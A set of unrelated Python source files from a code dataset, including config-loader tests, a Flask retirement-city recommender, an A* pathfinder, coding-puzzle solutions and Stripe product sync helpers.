not config.d\n assert config.out4 == -10\n\n\n@pytest.mark.parametrize(\n \"old_value\",\n [{\"encoder\": \"E1\", \"decoder\": \"D1\"}, \"unet\", [1, 2, 3], 5],\n)\n@pytest.mark.parametrize(\n \"new_value\",\n [\"unet\", [1, 2, 3], {\"encoder\": \"E1\", \"decoder\": \"D1\"}, 5],\n)\ndef test_config_object_mutations_nonconst(old_value, new_value, dirname):\n filepath = dirname / \"custom_module.py\"\n\n s = f\"\"\"\n\na = {old_value}\n\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath, mutations={\"a\": new_value})\n\n assert config.a == new_value\n\n\ndef test_config_object_mutations_assert(config_filepath):\n with pytest.raises(TypeError, match=r\"Argument mutations should be a mapping\"):\n ConfigObject(config_filepath, mutations=\"abc\")\n\n class A:\n pass\n\n with pytest.raises(ValueError, match=r\"Failed to create value's AST\"):\n ConfigObject(config_filepath, mutations={\"a\": A()})\n\n\n@pytest.mark.parametrize(\"mutations\", [None, {\"a\": [1, 2, 3]}])\ndef test_config_object_no_modules(mutations, config_filepath2):\n\n import numpy as np\n\n config = ConfigObject(config_filepath2, mutations=mutations)\n\n for k, v in config.items():\n assert not inspect.ismodule(v), f\"{k}: {v}\"\n\n assert \"a\" in config\n assert config.a == 1 if mutations is None else [1, 2, 3]\n assert \"arr\" in config\n np.testing.assert_allclose(config.arr, np.array([1, 2, 3]))\n assert \"out\" in config\n assert config.out == 12\n\n\ndef test_config_object_mutations_validate(dirname):\n filepath = dirname / \"custom_module.py\"\n\n s = \"\"\"\n\na = 123\n\ndef func(x):\n return x + a\n\nout = func(10)\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath, mutations={\"a\": 333, \"b\": 22.0})\n\n with pytest.raises(RuntimeError, match=r\"Following mutations were not applied\"):\n assert config.a == 333\n\n\ndef test_load_module(dirname):\n import numpy as np\n\n filepath = dirname / \"custom_module.py\"\n\n s = \"\"\"\nimport numpy as np\na = 123\nb = np.array([1, 2, 3])\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n custom_module = load_module(filepath)\n\n assert \"a\" in custom_module.__dict__\n assert custom_module.a == 123\n\n assert \"b\" in custom_module.__dict__\n np.testing.assert_allclose(custom_module.b, np.array([1, 2, 3]))\n\n\ndef test_load_module_wrong_args():\n with pytest.raises(ValueError, match=r\"is not found\"):\n load_module(\"/tmp/abcdef\")\n\n with pytest.raises(ValueError, match=r\"should be a file\"):\n load_module(\"/tmp/\")\n\n\ndef worker_function(config):\n pass\n\n\n@pytest.mark.parametrize(\"method\", [\"fork\", \"spawn\"])\ndef test_mp_config(method, config_filepath):\n\n config = ConfigObject(config_filepath)\n ctx = mp.get_context(method)\n p = ctx.Process(target=worker_function, args=(config,))\n p.start()\n p.join()\n\n\ndef worker_config_checker(config):\n import numpy as np\n\n assert \"a\" in config\n assert config.a == 123\n\n assert \"b\" in config\n np.testing.assert_allclose(config.b, np.array([1, 2, 3]))\n\n assert \"out\" in config\n assert config.out == 12\n\n\n@pytest.mark.parametrize(\"method\", [\"fork\", \"spawn\"])\ndef test_mp_config2(method, config_filepath2):\n\n config = ConfigObject(config_filepath2)\n ctx = mp.get_context(method)\n p = ctx.Process(target=worker_config_checker, args=(config,))\n p.start()\n p.join()\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"584263347","text":"from .models import Model\n\n\nclass Webhook(Model):\n\n @classmethod\n def parse(cls, api, json):\n webhook = cls(api)\n setattr(webhook, '_json', json)\n\n for k, v in json.items():\n setattr(webhook, k, v)\n\n return webhook\n","sub_path":"cogs/twitcasting/pytwitcast/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379420103","text":"from flask import Flask, render_template, jsonify, redirect\r\nfrom flask import jsonify\r\nimport csv\r\nimport json\r\nimport sqlite3 as sql\r\nimport pandas as pd \r\n# from __future__ import print_function\r\nimport sys\r\nimport time\r\n\r\n\r\napp = Flask(__name__)\r\napp.debug=True\r\n\r\n\r\ndef scoredata(uPopulation,uOver_65,uRent,uHome_Price,uAssistance,wPopulation,wOver_65,wRent,wHome_Price,wAssistance):\r\n# def scoredata():\r\n import json\r\n import sqlite3 as sql\r\n import numpy as np\r\n import pandas as pd \r\n\r\n conn = sql.connect(\"./Datasets/RetirementDB.sqlite\")\r\n\r\n c = conn.cursor()\r\n\r\n conn.execute(\"DELETE from CityProfile\")\r\n conn.commit()\r\n\r\n data = []\r\n with open('./retiredb.json') as f:\r\n data=list(json.load(f).items())\r\n\r\n for row in data: \r\n query = \"insert into CityProfile values (\"+\\\r\n \"'\"+row[1][\"City\"]+\"',\"+\\\r\n \"'\"+row[1][\"State\"]+\"',\"+\\\r\n \"'\"+row[1][\"Zipcode\"]+\"',\"+\\\r\n str(row[1][\"Rank\"])+\",\"+\\\r\n str(row[1][\"Population\"])+\",\"+\\\r\n str(row[1][\"Over_65\"])+\",\"+\\\r\n str(row[1][\"Rent\"])+\",\"+\\\r\n str(row[1][\"Home_Price\"])+\",\"+\\\r\n str(row[1][\"Assistance\"])+\",\"+\\\r\n str(row[1][\"Latitude\"])+\",\"+\\\r\n str(row[1][\"Longitude\"])+\",\"+\\\r\n \"'\"+row[1][\"URL\"]+\"')\"\r\n print(query)\r\n c.execute(query)\r\n conn.commit()\r\n\r\n ## Calculate Score\r\n import math\r\n\r\n print(\"Running actual engine using input:\")\r\n print(uPopulation)\r\n print(uOver_65)\r\n print(uRent)\r\n print(uHome_Price)\r\n print(uAssistance)\r\n\r\n print(wPopulation)\r\n print(wOver_65)\r\n print(wRent)\r\n print(wHome_Price)\r\n print(wAssistance)\r\n\r\n\r\n #1 Get Standardized Value\r\n #1.1 Calc Mean\r\n citylist=conn.execute(\"SELECT count(*) cntRow,avg(Population) avgPopulation,avg(Over_65) avgOver_65,avg(Rent) avgRent,avg(Home_Price) avgHome_Price,avg(Assistance) avgAssistance from CityProfile\")\r\n for avgrow in citylist:\r\n avgrow[0] \r\n\r\n RowCount=avgrow[0] \r\n meanPopulation=avgrow[1]\r\n meanOver_65=avgrow[2]\r\n meanRent=avgrow[3]\r\n meanHome_Price=avgrow[4]\r\n meanAssistance=avgrow[5]\r\n\r\n\r\n #1.2 Calc Standard Dev\r\n citylist=conn.execute(\"SELECT 1, Population,Over_65,Rent,Home_Price,Assistance from CityProfile\")\r\n rPopulation=0\r\n rOver_65=0\r\n rRent=0\r\n rHome_Price=0\r\n rAssistance=0\r\n for row in citylist:\r\n rPopulation=rPopulation+(row[1]-meanPopulation)**2\r\n rOver_65=rOver_65+(row[2]-meanOver_65)**2\r\n rRent=rRent+(row[3]-meanRent)**2\r\n rHome_Price=rHome_Price+(row[4]-meanHome_Price)**2\r\n rAssistance=rAssistance+(row[5]-meanAssistance)**2\r\n\r\n stdvPopulation=math.sqrt(rPopulation/RowCount)\r\n stdvOver_65=math.sqrt(rOver_65/RowCount)\r\n stdvRent=math.sqrt(rRent/RowCount)\r\n stdvHome_Price=math.sqrt(rHome_Price/RowCount)\r\n stdvAssistance=math.sqrt(rAssistance/RowCount)\r\n \r\n # 2 Apply Euclidean/Mahalanobis Distance Measure \r\n print(\"Starting Euclid\")\r\n print(uPopulation)\r\n print(meanPopulation)\r\n print(stdvPopulation)\r\n zuPopulation=(uPopulation-meanPopulation)/stdvPopulation\r\n zuOver_65=(uOver_65-meanOver_65)/stdvOver_65\r\n zuRent=(uRent-meanRent)/stdvRent\r\n zuHome_Price=(uHome_Price-meanHome_Price)/stdvHome_Price\r\n zuAssistance=(uAssistance-meanAssistance)/stdvAssistance\r\n print(\"Completed first part\")\r\n\r\n cityscore=[]\r\n citylist=conn.execute(\"SELECT 1, Population,Over_65,Rent,Home_Price,Assistance,City, State, \\\r\n Latitude,Longitude,URL,ZipCode,USNewsRank from CityProfile\")\r\n for row in citylist:\r\n\r\n cPopulation=row[1]\r\n cOver_65=row[2]\r\n cRent=row[3]\r\n cHome_Price=row[4]\r\n cAssistance=row[5]\r\n\r\n \r\n zcPopulation=(cPopulation-meanPopulation)/stdvPopulation\r\n zcOver_65=(cOver_65-meanOver_65)/stdvOver_65\r\n zcRent=(cRent-meanRent)/stdvRent\r\n zcHome_Price=(cHome_Price-meanHome_Price)/stdvHome_Price\r\n zcAssistance=(cAssistance-meanAssistance)/stdvAssistance\r\n \r\n # Cal Distance Score\r\n \r\n score=math.sqrt(((zuPopulation-zcPopulation)*wPopulation)**2+ \\\r\n ((zuOver_65-zcOver_65)*wOver_65)**2+ \\\r\n ((zuRent-zcRent)*wRent)**2+ \\\r\n ((zuHome_Price-zcHome_Price)*wHome_Price)**2+ \\\r\n ((zuAssistance-zcAssistance)*wAssistance)**2 \\\r\n )\r\n print(\"Score: \"+row[6]+\" \"+row[7]+\" \"+str(score))\r\n\r\n cityscore.append((row[6],row[7],row[8],row[9],row[10], \\\r\n uPopulation,uOver_65,uRent,uHome_Price,uAssistance, \\\r\n zuPopulation,zuOver_65,zuRent,zuHome_Price,zuAssistance, \\\r\n cPopulation,cOver_65,cRent,cHome_Price,cAssistance, \\\r\n zcPopulation,zcOver_65,zcRent,zcHome_Price,zcAssistance, \\\r\n score,row[11],row[12]))\r\n\r\n conn.execute(\"DELETE from CityProfileScored\")\r\n conn.commit()\r\n \r\n for row in cityscore:\r\n query = \"insert into CityProfileScored values (\"+\\\r\n \"'\"+row[0]+\"',\"+\\\r\n \"'\"+row[1]+\"',\"+\\\r\n str(row[2])+\",\"+\\\r\n str(row[3])+\",\"+\\\r\n \"'\"+row[4]+\"',\"+\\\r\n str(row[5])+\",\"+\\\r\n str(row[6])+\",\"+\\\r\n str(row[7])+\",\"+\\\r\n str(row[8])+\",\"+\\\r\n str(row[9])+\",\"+\\\r\n str(row[10])+\",\"+\\\r\n str(row[11])+\",\"+\\\r\n str(row[12])+\",\"+\\\r\n str(row[13])+\",\"+\\\r\n str(row[14])+\",\"+\\\r\n str(row[15])+\",\"+\\\r\n str(row[16])+\",\"+\\\r\n str(row[17])+\",\"+\\\r\n str(row[18])+\",\"+\\\r\n str(row[19])+\",\"+\\\r\n str(row[20])+\",\"+\\\r\n str(row[21])+\",\"+\\\r\n str(row[22])+\",\"+\\\r\n str(row[23])+\",\"+\\\r\n str(row[24])+\",\"+\\\r\n str(row[25])+\",\"+\\\r\n str(row[26])+\",\"+\\\r\n str(row[27])+\")\"\r\n print(query)\r\n c.execute(query)\r\n conn.commit() \r\n\r\n #Get Top 5 Cities\r\n conn.execute(\"drop table Top5CityState\")\r\n conn.commit()\r\n\r\n conn.execute(\"create table Top5CityState as SELECT CityProfileScored.*, \\\r\n (SELECT COUNT()+1 FROM (SELECT DISTINCT Score FROM CityProfileScored AS t WHERE Score < CityProfileScored.Score) \\\r\n ) AS RtrmtRank, USNewsTop100.Img,USNewsTop100.Link,CrimeData.CrimeRate \\\r\n FROM CityProfileScored \\\r\n left join USNewsTop100 on trim(CityProfileScored.City)=trim(USNewsTop100.City) and trim(CityProfileScored.State)=trim(USNewsTop100.State) \\\r\n left join CrimeData on trim(CityProfileScored.City)=trim(CrimeData.City) and trim(CityProfileScored.State)=trim(CrimeData.State) \\\r\n\t\t Where RtrmtRank<=5 \\\r\n order by RtrmtRank\") \r\n \r\n conn.commit()\r\n\r\n return 1\r\n\r\n\r\n\r\n\r\n@app.route(\"/\")\r\ndef index(): \r\n \r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/score/\")\r\ndef score(ScoreParam):\r\n print(\"Start Scoring Engine\")\r\n print(ScoreParam)\r\n uList = ScoreParam.split(\",\")\r\n\r\n puPopulation=float(uList[0])\r\n puOver_65=float(uList[1])\r\n puRent=float(uList[2])\r\n puHome_Price=float(uList[3])\r\n puAssistance=float(uList[4])\r\n pwPopulation=float(uList[5])\r\n pwOver_65=float(uList[6])\r\n pwRent=float(uList[7])\r\n pwHome_Price=float(uList[8])\r\n pwAssistance=float(uList[9])\r\n \r\n scr=scoredata(puPopulation,puOver_65,puRent,puHome_Price,puAssistance,pwPopulation,pwOver_65,pwRent,pwHome_Price,pwAssistance)\r\n\r\n conn = sql.connect(\"./Datasets/RetirementDB.sqlite\")\r\n c = conn.cursor()\r\n c.execute(\"select * from Top5CityState\")\r\n\r\n component = c.fetchall()\r\n top5=[]\r\n for row in component:\r\n top5.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12], \\\r\n row[13],row[14],row[15],row[16],row[17],row[18],row[19],row[20],row[21],row[22],row[23],row[24],row[25],row[26], \\\r\n row[27],row[28],row[29],row[30],row[31])) \r\n\r\n top5_df = pd.DataFrame(top5, columns=[\"City\",\"State\",\"Latitude\",\"Longitude\",\"URL\",\"uPopulation\", \\\r\n \"uOver_65\",\"uRent\",\"uHome_Price\",\"uAssistance\",\"zuPopulaton\", \\\r\n \"zuOver_65\",\"zuRent\",\"zuHome_Price\",\"zuAssistance\",\"cPopulation\", \\\r\n \"cOver_65\",\"cRent\",\"cHome_Price\",\"cAssistance\",\"zcPopulation\", \\\r\n \"zcOver_65\",\"zcRent\",\"zcHome_Price\",\"zcAssistance\", \\\r\n \"Score\",\"ZipCode\",\"USNewsRank\",\"RtrmtRank\",\"Img\",\"Link\",\"CrimeRate\"])\r\n top5_df.head() \r\n top5_df.to_json(orient='records')\r\n top5_dict=top5_df.to_json(orient='records') \r\n return json.dumps(top5_dict)\r\n\r\n\r\n@app.route(\"/usmap/\")\r\ndef usmap(): \r\n time.sleep(5) \r\n conn = sql.connect(\"./Datasets/RetirementDB.sqlite\")\r\n c = conn.cursor()\r\n\r\n\r\n # c.execute(\"select City,State,Latitude,Longitude,Score from CityProfileScored\")\r\n c.execute(\"SELECT CityProfileScored.City,CityProfileScored.State,CityProfileScored.Latitude,CityProfileScored.Longitude,CityProfileScored.Score, \\\r\n (SELECT COUNT()+1 FROM (SELECT DISTINCT Score FROM CityProfileScored AS t WHERE Score < CityProfileScored.Score) \\\r\n ) AS RtrmtRank \\\r\n FROM CityProfileScored \\\r\n order by RtrmtRank\")\r\n\r\n component = c.fetchall()\r\n allcities=[]\r\n for row in component:\r\n allcities.append((row[0],row[1],row[2],row[3],row[4],row[5])) \r\n\r\n allcities_df = pd.DataFrame(allcities, columns=[\"City\",\"State\",\"Latitude\",\"Longitude\",\"Score\",\"RtrmtRank\"])\r\n allcities_df.head() \r\n allcities_df.to_json(orient='records')\r\n allcities_dict=allcities_df.to_json(orient='records') \r\n return json.dumps(allcities_dict)\r\n\r\nif __name__ == \"__main__\":\r\n\r\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"375413222","text":"\n\nif __name__ == '__main__':\n T = int(input())\n for t in range(T):\n s = input()\n k = 0\n i = 0\n plus, minus = False, False\n\n if s[i] == '-': # treat the first -'s separately\n k += 1\n while i < len(s) and s[i] == '-':\n i += 1\n\n # then each '+-' pattern (repetitions don't count) augment k by 2\n while i < len(s) - 1:\n plus, minus = False, False\n # search for +'s\n while i < len(s) and s[i] == '+':\n plus = True\n i += 1\n # search for -'s, if there's none at the end of the string, the +'s count for nothing\n while i < len(s) and s[i] == '-':\n minus = True\n i += 1\n\n if plus and minus:\n k += 2\n\n\n print('Case #{}: {}'.format(t+1, k))\n","sub_path":"codes/CodeJamCrawler/16_0_2/Thooms./pbb.py","file_name":"pbb.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"443198536","text":"\"\"\"\r\nAuthor: Sikder Tahsin Al Amin\r\nProblem:\r\nGiven two arrays, write a function to compute their intersection.\r\nInput: nums1 = [1,2,2,1], nums2 = [2,2]\r\nOutput: [2]\r\n\"\"\"\r\ndef intersection(num1,num2):\r\n intersect = []\r\n #intersect = num1\r\n\r\n for i in num1:\r\n if i in num2:\r\n intersect.append(i)\r\n intersect = list(set(intersect))\r\n return intersect\r\n","sub_path":"leetcode-my-solutions/349_intersection_of_two_arrays.py","file_name":"349_intersection_of_two_arrays.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"75047712","text":"\"\"\"\r\n ----------------------------------------------------------------------------\r\n \"THE BEER-WARE LICENSE\"\r\n As long as you retain this notice you can do whatever you want with this\r\n stuff. If you meet an employee from Windward some day, and you think this\r\n stuff is worth it, you can buy them a beer in return. Windward Studios\r\n ----------------------------------------------------------------------------\r\n \"\"\"\r\n\r\nfrom debug import trap, printrap\r\n\r\n# CACHEPATHS dictionary contains a number and a list of points associated with that number\r\nCACHEPATHS = {}\r\nOFFSETS = ( (-1, 0), (1, 0), (0, -1), (0, 1) )\r\nDEAD_END = 10000\r\nPOINT_OFF_MAP = (-1, -1)\r\n\r\ndef calculatePath(gmap, start, end):\r\n \"\"\"Calculate and return a path from start to end.\r\n\r\n This implementation is intentionally stupid and is NOT guaranteed in any\r\n way. Specifically, although it may, it is not guaranteed to:\r\n ->Return the shortest possible path\r\n ->Return a legal path\r\n ->Return in a reasonable amount of time\r\n ->Be free of bugs\r\n\r\n Use unmodified at your own risk.\r\n\r\n map -- The game map.\r\n start -- The tile units of the start point (inclusive).\r\n end -- The tile units of the end point (inclusive).\r\n\r\n \"\"\"\r\n # should never happen but just to be sure\r\n if start == end:\r\n return [start]\r\n\r\n #startEnd = {start.x: None, start.y: None, end.x: None, end.y: None}\r\n #savedPath = []\r\n #if CACHEPATHS.get(start) is not None: # TODO, this is wrong\r\n #return savedPath\r\n\r\n # nodes are points we have walked to\r\n nodes = {}\r\n # points we have in a trailPoint, but not yet evaluated\r\n notEvaluated = {}\r\n\r\n tpOn = TrailPoint(start, end, 0)\r\n while True:\r\n nodes[tpOn.mapTile] = tpOn\r\n\r\n # get the neighbors\r\n tpClosest = None\r\n for ptOffset in OFFSETS:\r\n pointNeighbor = (tpOn.mapTile[0] + ptOffset[0], tpOn.mapTile[1] + ptOffset[1])\r\n square = gmap.squareOrDefault(pointNeighbor)\r\n # off the map or not a road/bus stop\r\n if square is None or (not square.isDriveable()):\r\n continue\r\n # already evaluated - add it in\r\n if pointNeighbor in nodes:\r\n tpAlreadyEvaluated = nodes[pointNeighbor]\r\n \r\n tpRecalc = None\r\n ptIgnore = None\r\n\r\n if (tpAlreadyEvaluated.costFromStart + 1 < tpOn.costFromStart):\r\n tpRecalc = tpOn\r\n ptIgnore = tpAlreadyEvaluated.mapTile\r\n elif(tpOn.costFromStart + 1 < tpAlreadyEvaluated.costFromStart):\r\n tpRecalc = tpAlreadyEvaluated\r\n ptIgnore = tpOn.mapTile\r\n else:\r\n tpRecalc = None\r\n ptIgnore = POINT_OFF_MAP\r\n\r\n tpOn.costFromStart = min(tpOn.costFromStart, tpAlreadyEvaluated.costFromStart + 1)\r\n tpAlreadyEvaluated.costFromStart = min(tpAlreadyEvaluated.costFromStart, tpOn.costFromStart + 1)\r\n tpOn.neighbors.append(tpAlreadyEvaluated)\r\n if tpRecalc is not None:\r\n tpRecalc.recalculateFromStart(ptIgnore, (gmap.width * gmap.height) / 4)\r\n continue\r\n\r\n # add this one in\r\n tpNeighbor = TrailPoint(pointNeighbor, end, tpOn.costFromStart+1)\r\n tpOn.neighbors.append(tpNeighbor)\r\n # may already be in notEvaluated. If so remove it as this is a more\r\n # recent cost estimate.\r\n if tpNeighbor in notEvaluated:\r\n del notEvaluated[tpNeighbor.mapTile]\r\n\r\n # we only assign to tpClosest if it is closer to the destination.\r\n # If it's further away, then we use notEvaluated below to find the\r\n # one closest to the dest that we ahve not walked yet.\r\n if tpClosest is None:\r\n if tpNeighbor.costCompletePath() < tpOn.costCompletePath():\r\n # new neighbor is closer - work from this next\r\n tpClosest = tpNeighbor\r\n else:\r\n # this is further away - put in the list to try if a\r\n # better route is not found\r\n notEvaluated[tpNeighbor.mapTile] = tpNeighbor\r\n elif tpClosest.costCompletePath() <= tpNeighbor.costCompletePath():\r\n # this is further away - put in the list to try if a\r\n # better route is not found\r\n notEvaluated[tpNeighbor.mapTile] = tpNeighbor\r\n else:\r\n # this is closer than tpOn and another neighbor - use it next.\r\n notEvaluated[tpClosest.mapTile] = tpClosest\r\n tpClosest = tpNeighbor\r\n # re-calc based on neighbors\r\n tpOn.recalculateDistance(POINT_OFF_MAP, gmap.width + gmap.height)\r\n\r\n # if no closest, then get from notEvaluated. This is where it\r\n # guarantees that we are getting the shortest route - we go in here\r\n # if the above did not move a step closer. This may not either as\r\n # the best choice may be the neighbor we didn't go with above - but\r\n # we drop into this to find the closest based on what we know.\r\n if tpClosest is None:\r\n # we need the closest one as that's how we find the shortest path\r\n tpClosest = None\r\n for i in notEvaluated.keys():\r\n if(tpClosest is None):\r\n tpClosest = notEvaluated[i]\r\n elif(tpClosest.costCompletePath() > notEvaluated[i].costCompletePath()):\r\n tpClosest = notEvaluated[i]\r\n\r\n if tpClosest is None:\r\n break\r\n del notEvaluated[tpClosest.mapTile]\r\n\r\n # if we're at the end - we're done!\r\n if tpClosest.mapTile == end:\r\n tpClosest.neighbors.append(tpOn)\r\n nodes[tpClosest.mapTile] = tpClosest\r\n break\r\n\r\n # try this one next\r\n tpOn = tpClosest\r\n\r\n path = []\r\n if not (end in nodes):\r\n return\r\n\r\n # create the return path - from end back to beginning\r\n tpOn = nodes[end]\r\n path.append(tpOn.mapTile)\r\n while tpOn.mapTile != start:\r\n neighbors = tpOn.neighbors\r\n cost = tpOn.costFromStart\r\n\r\n tpOn = sorted(neighbors, key=lambda x: x.costFromStart)[0] # TODO make sure this is ok\r\n\r\n # we didn't get to the start.\r\n if tpOn.costFromStart >= cost:\r\n return path\r\n else:\r\n path.insert(0, tpOn.mapTile)\r\n\r\n # TODO add to cache\r\n return path\r\n\r\nclass TrailPoint(object):\r\n def __init__(self, point, end, costFromStart):\r\n \"\"\"A point in a car's path.\r\n\r\n mapTile -- The map tile (a 2-tuple) for this point in the trail.\r\n neighbors -- A list of the neighboring tiles (up to 4). If 0 then this\r\n point has been added as a neighbor but is in the notEvaluated list\r\n because it has not yet been tried.\r\n costToEnd -- Estimate of the distance from mapTile to the end. Manhattan\r\n distance if have no neighbors, best neighbor.distance + 1 otherwise.\r\n This value is bad if it's along a trail that failed.\r\n costFromStart -- The number of steps from the start to this tile\r\n costCompletePath -- The cost from beginning to end if using this tile in the final path\r\n\r\n \"\"\"\r\n self.mapTile = point\r\n self.neighbors = []\r\n self.costToEnd = abs(point[0] - end[0]) + abs(point[1] - end[1])\r\n self.costFromStart = costFromStart\r\n\r\n def costCompletePath(self):\r\n return self.costFromStart + self.costToEnd\r\n\r\n def recalculateFromStart(self, ptIgnore, remainingSteps):\r\n if self.costFromStart == 0:\r\n return\r\n if ((remainingSteps - 1) < 0):\r\n return\r\n for neighborOn in self.neighbors:\r\n if neighborOn.mapTile is not ptIgnore:\r\n continue\r\n if neighborOn.costFromStart <= self.costFromStart + 1:\r\n continue\r\n neighborOn.costFromStart = self.costFromStart + 1\r\n neighborOn.recalculateFromStart(self.mapTile, remainingSteps)\r\n\r\n def recalculateDistance(self, mapTileCaller, remainingSteps):\r\n neighbors = self.neighbors\r\n trap(self.costToEnd == 0)\r\n # if no neighbors then this is in notEvaluated and so can't recalculate.\r\n if len(neighbors) == 0:\r\n return\r\n\r\n shortestDistance = None\r\n # if just one neighbor, then it's a dead end\r\n if len(neighbors) == 1:\r\n shortestDistance = DEAD_END\r\n else:\r\n shortestDistance = min(neighbors, key=lambda n: n.costToEnd).costToEnd\r\n # it's 1+ lowest neighbor value (unless a dead end)\r\n if shortestDistance != DEAD_END:\r\n shortestDistance += 1\r\n\r\n # no change, no need to recalc neighbors\r\n if shortestDistance == self.costToEnd:\r\n return\r\n # new value (could be shorter or longer)\r\n self.costToEnd = shortestDistance\r\n # if gone too far, no more recalculate\r\n if remainingSteps < 0:\r\n return\r\n remainingSteps -= 1\r\n # need to tell our neighbors - except the one that called us\r\n newNeighbors = [n for n in neighbors if n.mapTile != mapTileCaller]\r\n for neighborOn in newNeighbors:\r\n neighborOn.recalculateDistance(self.mapTile, remainingSteps)\r\n # and we re-calc again because that could have changed our neighbors' values\r\n shortestDistance = min(neighbors, key=lambda n: n.costToEnd).costToEnd\r\n # it's 1+ lowest neighbor value (unless a dead end)\r\n if shortestDistance != DEAD_END:\r\n shortestDistance += 1\r\n self.costToEnd = shortestDistance\r\n\r\n def __repr__(self):\r\n return (\"TrailPoint\" %\r\n (self.mapTile, self.costFromStart, self.costToEnd, len(self.neighbors)))\r\n\r\n def __hash__(self):\r\n return hash(\"TrailPoint at {0}\".format(self.mapTile))\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, TrailPoint) and other.mapTile == self.mapTile:\r\n return True\r\n else:\r\n return False","sub_path":"cw2014_python_client/simpleAStar.py","file_name":"simpleAStar.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"36413668","text":"import stripe\nfrom django.utils.encoding import smart_str\n\nfrom .. import utils\nfrom .. import models\nfrom .. actions import skus\n\ndef sync_products():\n \"\"\"\n Synchronizes all the products from the Stripe API\n \"\"\"\n try:\n products = stripe.Product.auto_paging_iter()\n except AttributeError:\n products = iter(stripe.Product.list().data)\n\n for product in products:\n sync_product_from_stripe_data(product)\n\ndef sync_product_from_stripe_data(stripe_product):\n \"\"\"\n Create or update the product represented by the data from a Stripe API query.\n\n Args:\n stripe_product: the data representing a sku object in the Stripe API\n\n Returns:\n a pinax.stripe.models.Product object\n \"\"\"\n\n stripe_product_id = stripe_product[\"id\"]\n\n defaults = {\n 'active': stripe_product.get(\"active\"),\n 'attributes': stripe_product.get(\"attributes\"),\n 'caption': stripe_product.get(\"caption\"),\n 'description': stripe_product.get(\"description\"),\n 'images': stripe_product.get(\"images\"),\n 'livemode': stripe_product.get(\"livemode\"),\n 'metadata': stripe_product.get(\"metadata\"),\n 'name': stripe_product.get(\"name\"),\n 'package_dimensions': stripe_product.get(\"package_dimensions\"),\n 'shippable': stripe_product.get(\"shippable\")\n }\n\n obj, created = models.Product.objects.get_or_create(stripe_id=stripe_product_id)\n obj = utils.update_with_defaults(obj, defaults, created)\n skus.sync_skus_from_product(obj)\n return obj\n\ndef create(name, p_id=\"\", caption=\"\", description=\"\", active=True, shippable=False, attributes=None, images=None, metadata=None, package_dimensions=None):\n \"\"\"\n Creates a product\n\n Args:\n name: The product’s name, meant to be displayable to the customer.\n p_id: optionally, Unique identifier for the object, If an ID isn't provided, we'll generate one for you.\n caption: optionally, A short one-line description of the product, meant to be displayable to the customer.\n description: optionally, The product’s description, meant to be displayable to the customer.\n active: optionally, Whether or not the product is currently available for purchase. Defaults to True\n shippable: optionally, Whether this product is shipped (i.e. physical goods). Defaults to False.\n attributes: optionally, A list of up to 5 alphanumeric attributes that each SKU can provide values for (e.g. [\"color\", \"size\"]).\n images: optionally, A list of up to 8 URLs of images for this product, meant to be displayable to the customer.\n metadata: optionally, A set of key/value pairs that you can attach to a product object. It can be useful for storing additional information about the product in a structured format.\n package_dimensions: optionally, The dimensions of this product for shipping purposes, all values are required. e.g\n {\n \"height\": 20\n \"length\": 21\n \"weight\": 22\n \"width\": 23\n }\n\n Returns:\n the data representing the product object that was created\n \"\"\"\n\n product_params = {\n \"name\": name,\n \"active\": active,\n \"shippable\": shippable\n }\n\n if p_id:\n product_params.update({\"id\": p_id})\n\n if caption:\n product_params.update({\"caption\": caption})\n\n if description:\n product_params.update({\"description\": description})\n\n if attributes:\n product_params.update({\"attributes\": attributes})\n\n if images:\n product_params.update({\"images\": images})\n\n if metadata:\n product_params.update({\"images\": metadata})\n\n if package_dimensions:\n product_params.update({\"package_dimensions\": package_dimensions})\n\n stripe_product = stripe.Product.create(**product_params)\n return sync_product_from_stripe_data(stripe_product)\n\ndef update(product, name=\"\", caption=\"\", description=\"\", active=None, shippable=False, attributes=None, images=None, metadata=None, package_dimensions=None):\n \"\"\"\n Updates a product\n\n Args:\n product: the product to update\n name: optionally, whether or not to charge immediately\n caption: optionally, whether or not to charge immediately\n description: optionally, whether or not to charge immediately\n active: optionally, whether or not to charge immediately\n shippable: optionally, whether or not to charge immediately\n attributes: optionally, whether or not to charge immediately\n images: optionally, whether or not to charge immediately\n metadata: optionally, whether or not to charge immediately\n package_dimensions: optionally, whether or not to charge immediately\n \"\"\"\n\n stripe_product = product.stripe_product\n\n if name:\n stripe_product.name = name\n if caption:\n stripe_product.caption = caption\n if description:\n stripe_product.description = description\n if active is not None:\n stripe_product.active = active\n if shippable:\n stripe_product.shippable = shippable\n if attributes:\n stripe_product.attributes = attributes\n if images:\n stripe_product.images = images\n if metadata:\n stripe_product.metadata = metadata\n if package_dimensions:\n stripe_product.images = package_dimensions\n\n stripe_product.save()\n sync_product_from_stripe_data(stripe_product)\n\ndef retrieve(product_id):\n \"\"\"\n Retrieve a sku object from Stripe's API\n\n Stripe throws an exception if the product has been deleted that we are\n attempting to sync. In this case we want to just silently ignore that\n exception but pass on any other.\n\n Args:\n product_id: the Stripe ID of the product you are fetching\n\n Returns:\n the data for a order object from the Stripe API\n \"\"\"\n if not product_id:\n return\n\n try:\n return stripe.Product.retrieve(product_id)\n except stripe.InvalidRequestError as e:\n if smart_str(e).find(\"No such product\") == -1:\n raise\n else:\n # Not Found\n return 